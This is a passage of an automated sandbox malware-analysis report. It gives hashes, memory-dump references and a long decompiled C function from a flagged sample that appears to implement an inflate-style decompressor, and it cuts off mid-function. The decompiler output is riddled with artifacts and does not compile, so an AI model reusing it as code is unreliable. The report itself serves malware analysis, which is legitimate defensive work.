                                                                            • String ID: `
                                                                            • API String ID: 0-1850852036
                                                                            • Opcode ID: ed2963ef7ac6d3e446b1c72a177f6b842a297acf441d34ccae2e1542e5ed2e0c
                                                                            • Instruction ID: f7806d61ed32c72e1961e2af6bd7648733caaa80972945f4ecce55c4e6c49de9
                                                                            • Opcode Fuzzy Hash: ed2963ef7ac6d3e446b1c72a177f6b842a297acf441d34ccae2e1542e5ed2e0c
                                                                            • Instruction Fuzzy Hash: 3031D535600A98CFEF748E3A9F697DE37B39F92340F95842ACC4A4B155D7308256CB02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bc1de6d3603416c443ecccfa95a370c63bce51895b257daf1471da891048536
                                                                            • Instruction ID: d1b7ad49d54b2c0a1df1a73c9f6c9a202ec01b539232c6c0ab89a04dcd8b7e8c
                                                                            • Opcode Fuzzy Hash: 0bc1de6d3603416c443ecccfa95a370c63bce51895b257daf1471da891048536
                                                                            • Instruction Fuzzy Hash: 0CC18772A043499FCB388E38CD987EB7BB6AF58310F95452EDC89DB205D7319985CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                            			E00406D85(signed int __ebx, signed int* __esi) {
                                                                            				signed int _t396;
                                                                            				signed int _t425;
                                                                            				signed int _t442;
                                                                            				signed int _t443;
                                                                            				signed int* _t446;
                                                                            				void* _t448;
                                                                            
                                                                            				L0:
                                                                            				while(1) {
                                                                            					L0:
                                                                            					_t446 = __esi;
                                                                            					_t425 = __ebx;
                                                                            					if( *(_t448 - 0x34) == 0) {
                                                                            						break;
                                                                            					}
                                                                            					L55:
                                                                            					__eax =  *(__ebp - 0x38);
                                                                            					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            					__ecx = __ebx;
                                                                            					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            					__ebx = __ebx + 8;
                                                                            					while(1) {
                                                                            						L56:
                                                                            						if(__ebx < 0xe) {
                                                                            							goto L0;
                                                                            						}
                                                                            						L57:
                                                                            						__eax =  *(__ebp - 0x40);
                                                                            						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                            						__ecx = __eax;
                                                                            						__esi[1] = __eax;
                                                                            						__ecx = __eax & 0x0000001f;
                                                                            						if(__cl > 0x1d) {
                                                                            							L9:
                                                                            							_t443 = _t442 | 0xffffffff;
                                                                            							 *_t446 = 0x11;
                                                                            							L10:
                                                                            							_t446[0x147] =  *(_t448 - 0x40);
                                                                            							_t446[0x146] = _t425;
                                                                            							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                            							L11:
                                                                            							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                            							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                            							L004074F4( *(_t448 + 8));
                                                                            							return _t443;
                                                                            						}
                                                                            						L58:
                                                                            						__eax = __eax & 0x000003e0;
                                                                            						if(__eax > 0x3a0) {
                                                                            							goto L9;
                                                                            						}
                                                                            						L59:
                                                                            						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                            						__ebx = __ebx - 0xe;
                                                                            						_t94 =  &(__esi[2]);
                                                                            						 *_t94 = __esi[2] & 0x00000000;
                                                                            						 *__esi = 0xc;
                                                                            						while(1) {
                                                                            							L60:
                                                                            							__esi[1] = __esi[1] >> 0xa;
                                                                            							__eax = (__esi[1] >> 0xa) + 4;
                                                                            							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                            								goto L68;
                                                                            							}
                                                                            							L61:
                                                                            							while(1) {
                                                                            								L64:
                                                                            								if(__ebx >= 3) {
                                                                            									break;
                                                                            								}
                                                                            								L62:
                                                                            								if( *(__ebp - 0x34) == 0) {
                                                                            									goto L183;
                                                                            								}
                                                                            								L63:
                                                                            								__eax =  *(__ebp - 0x38);
                                                                            								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            								__ecx = __ebx;
                                                                            								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            								__ebx = __ebx + 8;
                                                                            							}
                                                                            							L65:
                                                                            							__ecx = __esi[2];
                                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                            							__ebx = __ebx - 3;
                                                                            							_t108 = __ecx + 0x4084d4; // 0x121110
                                                                            							__ecx =  *_t108;
                                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                            							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                            							__ecx = __esi[1];
                                                                            							__esi[2] = __esi[2] + 1;
                                                                            							__eax = __esi[2];
                                                                            							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                            							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                            								goto L64;
                                                                            							}
                                                                            							L66:
                                                                            							while(1) {
                                                                            								L68:
                                                                            								if(__esi[2] >= 0x13) {
                                                                            									break;
                                                                            								}
                                                                            								L67:
                                                                            								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                                            								__eax =  *_t119;
                                                                            								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                            								_t126 =  &(__esi[2]);
                                                                            								 *_t126 = __esi[2] + 1;
                                                                            							}
                                                                            							L69:
                                                                            							__ecx = __ebp - 8;
                                                                            							__edi =  &(__esi[0x143]);
                                                                            							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                            							__eax = 0;
                                                                            							 *(__ebp - 8) = 0;
                                                                            							__eax =  &(__esi[3]);
                                                                            							 *__edi = 7;
                                                                            							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                            							if(__eax != 0) {
                                                                            								L72:
                                                                            								 *__esi = 0x11;
                                                                            								while(1) {
                                                                            									L181:
                                                                            									_t396 =  *_t446;
                                                                            									if(_t396 > 0xf) {
                                                                            										break;
                                                                            									}
                                                                            									L1:
                                                                            									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                                            										case 0:
                                                                            											L101:
                                                                            											__eax = __esi[4] & 0x000000ff;
                                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                                            											__eax = __esi[5];
                                                                            											__esi[2] = __esi[5];
                                                                            											 *__esi = 1;
                                                                            											goto L102;
                                                                            										case 1:
                                                                            											L102:
                                                                            											__eax = __esi[3];
                                                                            											while(1) {
                                                                            												L105:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L103:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L104:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L106:
                                                                            											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                                            											__ecx = __esi[2];
                                                                            											__eax = __esi[2] + __eax * 4;
                                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                            											__ecx =  *__eax & 0x000000ff;
                                                                            											__eflags = __ecx;
                                                                            											if(__ecx != 0) {
                                                                            												L108:
                                                                            												__eflags = __cl & 0x00000010;
                                                                            												if((__cl & 0x00000010) == 0) {
                                                                            													L110:
                                                                            													__eflags = __cl & 0x00000040;
                                                                            													if((__cl & 0x00000040) == 0) {
                                                                            														goto L125;
                                                                            													}
                                                                            													L111:
                                                                            													__eflags = __cl & 0x00000020;
                                                                            													if((__cl & 0x00000020) == 0) {
                                                                            														goto L9;
                                                                            													}
                                                                            													L112:
                                                                            													 *__esi = 7;
                                                                            													goto L181;
                                                                            												}
                                                                            												L109:
                                                                            												__esi[2] = __ecx;
                                                                            												__esi[1] = __eax;
                                                                            												 *__esi = 2;
                                                                            												goto L181;
                                                                            											}
                                                                            											L107:
                                                                            											__esi[2] = __eax;
                                                                            											 *__esi = 6;
                                                                            											goto L181;
                                                                            										case 2:
                                                                            											L113:
                                                                            											__eax = __esi[2];
                                                                            											while(1) {
                                                                            												L116:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L114:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L115:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L117:
                                                                            											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                            											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                            											__ecx = __eax;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - __eax;
                                                                            											__eflags = __ebx;
                                                                            											__eax = __esi[4] & 0x000000ff;
                                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                                            											__eax = __esi[6];
                                                                            											__esi[2] = __esi[6];
                                                                            											 *__esi = 3;
                                                                            											goto L118;
                                                                            										case 3:
                                                                            											L118:
                                                                            											__eax = __esi[3];
                                                                            											while(1) {
                                                                            												L121:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L119:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L120:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L122:
                                                                            											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                                            											__ecx = __esi[2];
                                                                            											__eax = __esi[2] + __eax * 4;
                                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                            											__ecx =  *__eax & 0x000000ff;
                                                                            											__eflags = __cl & 0x00000010;
                                                                            											if((__cl & 0x00000010) == 0) {
                                                                            												L124:
                                                                            												__eflags = __cl & 0x00000040;
                                                                            												if((__cl & 0x00000040) != 0) {
                                                                            													goto L9;
                                                                            												}
                                                                            												L125:
                                                                            												__esi[3] = __ecx;
                                                                            												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                            												__esi[2] = __eax;
                                                                            												goto L181;
                                                                            											}
                                                                            											L123:
                                                                            											__esi[2] = __ecx;
                                                                            											__esi[3] = __eax;
                                                                            											 *__esi = 4;
                                                                            											goto L181;
                                                                            										case 4:
                                                                            											L126:
                                                                            											__eax = __esi[2];
                                                                            											while(1) {
                                                                            												L129:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L127:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L128:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L130:
                                                                            											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                            											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                            											__ecx = __eax;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - __eax;
                                                                            											__eflags = __ebx;
                                                                            											 *__esi = 5;
                                                                            											goto L131;
                                                                            										case 5:
                                                                            											L131:
                                                                            											__eax =  *(__ebp - 0x30);
                                                                            											__edx = __esi[3];
                                                                            											__eax = __eax - __esi;
                                                                            											__ecx = __eax - __esi - 0x1ba0;
                                                                            											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                            											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                            												__ecx = __eax;
                                                                            												__ecx = __eax - __edx;
                                                                            												__eflags = __ecx;
                                                                            											} else {
                                                                            												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                            												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                            												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                            											}
                                                                            											__eflags = __esi[1];
                                                                            											 *(__ebp - 0x20) = __ecx;
                                                                            											if(__esi[1] != 0) {
                                                                            												L135:
                                                                            												__edi =  *(__ebp - 0x2c);
                                                                            												do {
                                                                            													L136:
                                                                            													__eflags = __edi;
                                                                            													if(__edi != 0) {
                                                                            														goto L152;
                                                                            													}
                                                                            													L137:
                                                                            													__edi = __esi[0x26e8];
                                                                            													__eflags = __eax - __edi;
                                                                            													if(__eax != __edi) {
                                                                            														L143:
                                                                            														__esi[0x26ea] = __eax;
                                                                            														__eax = L004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                            														__eax = __esi[0x26ea];
                                                                            														__ecx = __esi[0x26e9];
                                                                            														__eflags = __eax - __ecx;
                                                                            														 *(__ebp - 0x30) = __eax;
                                                                            														if(__eax >= __ecx) {
                                                                            															__edi = __esi[0x26e8];
                                                                            															__edi = __esi[0x26e8] - __eax;
                                                                            															__eflags = __edi;
                                                                            														} else {
                                                                            															__ecx = __ecx - __eax;
                                                                            															__edi = __ecx - __eax - 1;
                                                                            														}
                                                                            														__edx = __esi[0x26e8];
                                                                            														__eflags = __eax - __edx;
                                                                            														 *(__ebp - 8) = __edx;
                                                                            														if(__eax == __edx) {
                                                                            															__edx =  &(__esi[0x6e8]);
                                                                            															__eflags = __ecx - __edx;
                                                                            															if(__ecx != __edx) {
                                                                            																__eax = __edx;
                                                                            																__eflags = __eax - __ecx;
                                                                            																 *(__ebp - 0x30) = __eax;
                                                                            																if(__eax >= __ecx) {
                                                                            																	__edi =  *(__ebp - 8);
                                                                            																	__edi =  *(__ebp - 8) - __eax;
                                                                            																	__eflags = __edi;
                                                                            																} else {
                                                                            																	__ecx = __ecx - __eax;
                                                                            																	__edi = __ecx;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            														__eflags = __edi;
                                                                            														if(__edi == 0) {
                                                                            															goto L184;
                                                                            														} else {
                                                                            															goto L152;
                                                                            														}
                                                                            													}
                                                                            													L138:
                                                                            													__ecx = __esi[0x26e9];
                                                                            													__edx =  &(__esi[0x6e8]);
                                                                            													__eflags = __ecx - __edx;
                                                                            													if(__ecx == __edx) {
                                                                            														goto L143;
                                                                            													}
                                                                            													L139:
                                                                            													__eax = __edx;
                                                                            													__eflags = __eax - __ecx;
                                                                            													if(__eax >= __ecx) {
                                                                            														__edi = __edi - __eax;
                                                                            														__eflags = __edi;
                                                                            													} else {
                                                                            														__ecx = __ecx - __eax;
                                                                            														__edi = __ecx;
                                                                            													}
                                                                            													__eflags = __edi;
                                                                            													if(__edi == 0) {
                                                                            														goto L143;
                                                                            													}
                                                                            													L152:
                                                                            													__ecx =  *(__ebp - 0x20);
                                                                            													 *__eax =  *__ecx;
                                                                            													__eax = __eax + 1;
                                                                            													__ecx = __ecx + 1;
                                                                            													__edi = __edi - 1;
                                                                            													__eflags = __ecx - __esi[0x26e8];
                                                                            													 *(__ebp - 0x30) = __eax;
                                                                            													 *(__ebp - 0x20) = __ecx;
                                                                            													 *(__ebp - 0x2c) = __edi;
                                                                            													if(__ecx == __esi[0x26e8]) {
                                                                            														__ecx =  &(__esi[0x6e8]);
                                                                            														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                            													}
                                                                            													_t357 =  &(__esi[1]);
                                                                            													 *_t357 = __esi[1] - 1;
                                                                            													__eflags =  *_t357;
                                                                            												} while ( *_t357 != 0);
                                                                            											}
                                                                            											goto L23;
                                                                            										case 6:
                                                                            											L156:
                                                                            											__eax =  *(__ebp - 0x2c);
                                                                            											__edi =  *(__ebp - 0x30);
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												L173:
                                                                            												__cl = __esi[2];
                                                                            												 *__edi = __cl;
                                                                            												__edi = __edi + 1;
                                                                            												__eax = __eax - 1;
                                                                            												 *(__ebp - 0x30) = __edi;
                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                            												goto L23;
                                                                            											}
                                                                            											L157:
                                                                            											__ecx = __esi[0x26e8];
                                                                            											__eflags = __edi - __ecx;
                                                                            											if(__edi != __ecx) {
                                                                            												L164:
                                                                            												__esi[0x26ea] = __edi;
                                                                            												__eax = L004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                            												__edi = __esi[0x26ea];
                                                                            												__ecx = __esi[0x26e9];
                                                                            												__eflags = __edi - __ecx;
                                                                            												 *(__ebp - 0x30) = __edi;
                                                                            												if(__edi >= __ecx) {
                                                                            													__eax = __esi[0x26e8];
                                                                            													__eax = __esi[0x26e8] - __edi;
                                                                            													__eflags = __eax;
                                                                            												} else {
                                                                            													__ecx = __ecx - __edi;
                                                                            													__eax = __ecx - __edi - 1;
                                                                            												}
                                                                            												__edx = __esi[0x26e8];
                                                                            												__eflags = __edi - __edx;
                                                                            												 *(__ebp - 8) = __edx;
                                                                            												if(__edi == __edx) {
                                                                            													__edx =  &(__esi[0x6e8]);
                                                                            													__eflags = __ecx - __edx;
                                                                            													if(__ecx != __edx) {
                                                                            														__edi = __edx;
                                                                            														__eflags = __edi - __ecx;
                                                                            														 *(__ebp - 0x30) = __edi;
                                                                            														if(__edi >= __ecx) {
                                                                            															__eax =  *(__ebp - 8);
                                                                            															__eax =  *(__ebp - 8) - __edi;
                                                                            															__eflags = __eax;
                                                                            														} else {
                                                                            															__ecx = __ecx - __edi;
                                                                            															__eax = __ecx;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            												__eflags = __eax;
                                                                            												if(__eax == 0) {
                                                                            													goto L184;
                                                                            												} else {
                                                                            													goto L173;
                                                                            												}
                                                                            											}
                                                                            											L158:
                                                                            											__eax = __esi[0x26e9];
                                                                            											__edx =  &(__esi[0x6e8]);
                                                                            											__eflags = __eax - __edx;
                                                                            											if (__eax == __edx) goto L164;
                                                                            											asm("adc ecx, [ebx+0x73f83bfa]");
                                                                            										case 7:
                                                                            											L174:
                                                                            											__eflags = __ebx - 7;
                                                                            											if(__ebx > 7) {
                                                                            												__ebx = __ebx - 8;
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                            												_t380 = __ebp - 0x38;
                                                                            												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                            												__eflags =  *_t380;
                                                                            											}
                                                                            											goto L176;
                                                                            										case 8:
                                                                            											L4:
                                                                            											while(_t425 < 3) {
                                                                            												if( *(_t448 - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												} else {
                                                                            													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                            													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                            													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                            													_t425 = _t425 + 8;
                                                                            													continue;
                                                                            												}
                                                                            											}
                                                                            											_t425 = _t425 - 3;
                                                                            											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                            											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                            											asm("sbb ecx, ecx");
                                                                            											_t408 = _t406 >> 1;
                                                                            											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                            											if(_t408 == 0) {
                                                                            												L24:
                                                                            												 *_t446 = 9;
                                                                            												_t436 = _t425 & 0x00000007;
                                                                            												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                            												_t425 = _t425 - _t436;
                                                                            												goto L181;
                                                                            											}
                                                                            											L6:
                                                                            											_t411 = _t408 - 1;
                                                                            											if(_t411 == 0) {
                                                                            												L13:
                                                                            												__eflags =  *0x432e90;
                                                                            												if( *0x432e90 != 0) {
                                                                            													L22:
                                                                            													_t412 =  *0x40a5e8; // 0x9
                                                                            													_t446[4] = _t412;
                                                                            													_t413 =  *0x40a5ec; // 0x5
                                                                            													_t446[4] = _t413;
                                                                            													_t414 =  *0x431d0c; // 0x0
                                                                            													_t446[5] = _t414;
                                                                            													_t415 =  *0x431d08; // 0x0
                                                                            													_t446[6] = _t415;
                                                                            													L23:
                                                                            													 *_t446 =  *_t446 & 0x00000000;
                                                                            													goto L181;
                                                                            												} else {
                                                                            													_t26 = _t448 - 8;
                                                                            													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                            													__eflags =  *_t26;
                                                                            													_t416 = 0x431d10;
                                                                            													do {
                                                                            														L15:
                                                                            														__eflags = _t416 - 0x431f4c;
                                                                            														_t438 = 8;
                                                                            														if(_t416 > 0x431f4c) {
                                                                            															__eflags = _t416 - 0x432110;
                                                                            															if(_t416 >= 0x432110) {
                                                                            																__eflags = _t416 - 0x432170;
                                                                            																if(_t416 < 0x432170) {
                                                                            																	_t438 = 7;
                                                                            																}
                                                                            															} else {
                                                                            																_t438 = 9;
                                                                            															}
                                                                            														}
                                                                            														L20:
                                                                            														 *_t416 = _t438;
                                                                            														_t416 = _t416 + 4;
                                                                            														__eflags = _t416 - 0x432190;
                                                                            													} while (_t416 < 0x432190);
                                                                            													E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                                            													_push(0x1e);
                                                                            													_pop(_t440);
                                                                            													_push(5);
                                                                            													_pop(_t419);
                                                                            													memset(0x431d10, _t419, _t440 << 2);
                                                                            													_t450 = _t450 + 0xc;
                                                                            													_t442 = 0x431d10 + _t440;
                                                                            													E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                                            													 *0x432e90 =  *0x432e90 + 1;
                                                                            													__eflags =  *0x432e90;
                                                                            													goto L22;
                                                                            												}
                                                                            											}
                                                                            											L7:
                                                                            											_t423 = _t411 - 1;
                                                                            											if(_t423 == 0) {
                                                                            												 *_t446 = 0xb;
                                                                            												goto L181;
                                                                            											}
                                                                            											L8:
                                                                            											if(_t423 != 1) {
                                                                            												goto L181;
                                                                            											}
                                                                            											goto L9;
                                                                            										case 9:
                                                                            											while(1) {
                                                                            												L27:
                                                                            												__eflags = __ebx - 0x20;
                                                                            												if(__ebx >= 0x20) {
                                                                            													break;
                                                                            												}
                                                                            												L25:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L26:
                                                                            												__eax =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__ecx = __ebx;
                                                                            												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L28:
                                                                            											__eax =  *(__ebp - 0x40);
                                                                            											__ebx = 0;
                                                                            											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                            											 *(__ebp - 0x40) = 0;
                                                                            											__eflags = __eax;
                                                                            											__esi[1] = __eax;
                                                                            											if(__eax == 0) {
                                                                            												goto L53;
                                                                            											}
                                                                            											L29:
                                                                            											_push(0xa);
                                                                            											_pop(__eax);
                                                                            											goto L54;
                                                                            										case 0xa:
                                                                            											L30:
                                                                            											__eflags =  *(__ebp - 0x34);
                                                                            											if( *(__ebp - 0x34) == 0) {
                                                                            												goto L183;
                                                                            											}
                                                                            											L31:
                                                                            											__eax =  *(__ebp - 0x2c);
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												L48:
                                                                            												__eflags = __eax -  *(__ebp - 0x34);
                                                                            												if(__eax >=  *(__ebp - 0x34)) {
                                                                            													__eax =  *(__ebp - 0x34);
                                                                            												}
                                                                            												__ecx = __esi[1];
                                                                            												__eflags = __ecx - __eax;
                                                                            												__edi = __ecx;
                                                                            												if(__ecx >= __eax) {
                                                                            													__edi = __eax;
                                                                            												}
                                                                            												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                            												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                            												_t80 =  &(__esi[1]);
                                                                            												 *_t80 = __esi[1] - __edi;
                                                                            												__eflags =  *_t80;
                                                                            												if( *_t80 == 0) {
                                                                            													L53:
                                                                            													__eax = __esi[0x145];
                                                                            													L54:
                                                                            													 *__esi = __eax;
                                                                            												}
                                                                            												goto L181;
                                                                            											}
                                                                            											L32:
                                                                            											__ecx = __esi[0x26e8];
                                                                            											__edx =  *(__ebp - 0x30);
                                                                            											__eflags = __edx - __ecx;
                                                                            											if(__edx != __ecx) {
                                                                            												L38:
                                                                            												__esi[0x26ea] = __edx;
                                                                            												__eax = L004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                            												__edx = __esi[0x26ea];
                                                                            												__ecx = __esi[0x26e9];
                                                                            												__eflags = __edx - __ecx;
                                                                            												 *(__ebp - 0x30) = __edx;
                                                                            												if(__edx >= __ecx) {
                                                                            													__eax = __esi[0x26e8];
                                                                            													__eax = __esi[0x26e8] - __edx;
                                                                            													__eflags = __eax;
                                                                            												} else {
                                                                            													__ecx = __ecx - __edx;
                                                                            													__eax = __ecx - __edx - 1;
                                                                            												}
                                                                            												__edi = __esi[0x26e8];
                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                            												__eflags = __edx - __edi;
                                                                            												if(__edx == __edi) {
                                                                            													__edx =  &(__esi[0x6e8]);
